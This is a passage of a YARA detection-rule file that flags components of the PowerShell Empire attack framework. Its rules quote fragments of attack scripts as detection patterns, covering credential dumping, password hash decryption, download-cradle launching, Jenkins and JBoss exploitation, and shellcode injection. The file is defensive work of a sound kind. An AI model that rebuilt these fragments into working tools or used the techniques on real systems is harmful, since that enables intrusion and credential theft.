license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "a914cb227f652734a91d3d39745ceeacaef7a8b5e89c1beedfd6d5f9b4615a1d"
id = "1e1d1e71-6ea9-500a-b8b8-c48a64bc2b54"
strings:
$s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
$s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii
$s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii
condition:
filesize < 20KB and 2 of them
}
rule Empire_Invoke_MetasploitPayload {
meta:
description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
id = "608c30b0-826a-55b1-afb8-756b476d6b55"
strings:
$s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
$s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 9KB and 1 of them ) or all of them
}
rule Empire_Exploit_Jenkins {
meta:
description = "Detects Empire component - file Exploit-Jenkins.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
id = "f2162783-34cd-5db4-bd1c-6c58feb92e77"
strings:
$s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
$s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii
$s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
condition:
( uint16(0) == 0x6620 and filesize < 7KB and 1 of them ) or all of them
}
rule Empire_Get_SecurityPackages {
meta:
description = "Detects Empire component - file Get-SecurityPackages.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
id = "a109eda1-a26d-5cf6-b6b5-1a1a1e770a0a"
strings:
$s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
$s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
}
rule Empire_Invoke_PowerDump {
meta:
description = "Detects Empire component - file Invoke-PowerDump.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
id = "d1082a4e-d458-57fb-b332-7c775c8ef2dd"
strings:
$x16 = "$enc = Get-PostHashdumpScript" fullword ascii
$x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
$x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii
condition:
( uint16(0) == 0x2023 and filesize < 60KB and 1 of them ) or all of them
}
rule Empire_Install_SSP {
meta:
description = "Detects Empire component - file Install-SSP.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
id = "06bbdcc5-c48b-5753-88a2-5c962d1b986f"
strings:
$s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
}
rule Empire_Invoke_ShellcodeMSIL {
meta:
description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
id = "06011b51-bad7-5656-ac37-e49f9b6d0498"
strings:
$s1 = "$FinalShellcode.Length" fullword ascii
$s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
$s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
$s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
rule HKTL_Empire_PowerUp {
meta:
description = "Detects Empire component - file PowerUp.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
id = "e79d093e-7481-52a3-a350-4d1b6d8955cd"
strings:
$x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
condition:
( uint16(0) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
}
rule Empire_Get_GPPPassword {
meta:
description = "Detects Empire component - file Get-GPPPassword.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
id = "7791b009-19d3-5d08-8ef7-4723d28830ed"
strings:
$s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
$s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
$s3 = "function Get-DecryptedCpassword {" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
rule Empire_Invoke_SmbScanner {
meta:
description = "Detects Empire component - file Invoke-SmbScanner.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
id = "63cd048b-04fd-5b4f-9d4d-3a001c31b4df"
strings:
$s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
$s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}
rule Empire_Exploit_JBoss {
meta:
description = "Detects Empire component - file Exploit-JBoss.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
id = "a9c75cf5-9469-5a45-b750-69728ed0069f"
strings:
$s1 = "Exploit-JBoss" fullword ascii
$s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
$s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
$s4 = "http://blog.rvrsh3ll.net" fullword ascii
$s5 = "Remote URL to your own WARFile to deploy." fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}
rule Empire_dumpCredStore {
meta:
description = "Detects Empire component - file dumpCredStore.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
id = "cdb87ed4-fa90-5724-b37d-97cf8e4b8326"
strings:
$x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
$s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
$s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
condition:
( uint16(0) == 0x233c and filesize < 40KB and 1 of them ) or all of them
}
rule Empire_Invoke_EgressCheck {
meta:
description = "Detects Empire component - file Invoke-EgressCheck.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
id = "21e09250-6853-5743-a6ef-aa6be8091d33"
strings:
$s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
condition:
( uint16(0) == 0x233c and filesize < 10KB and 1 of them ) or all of them
}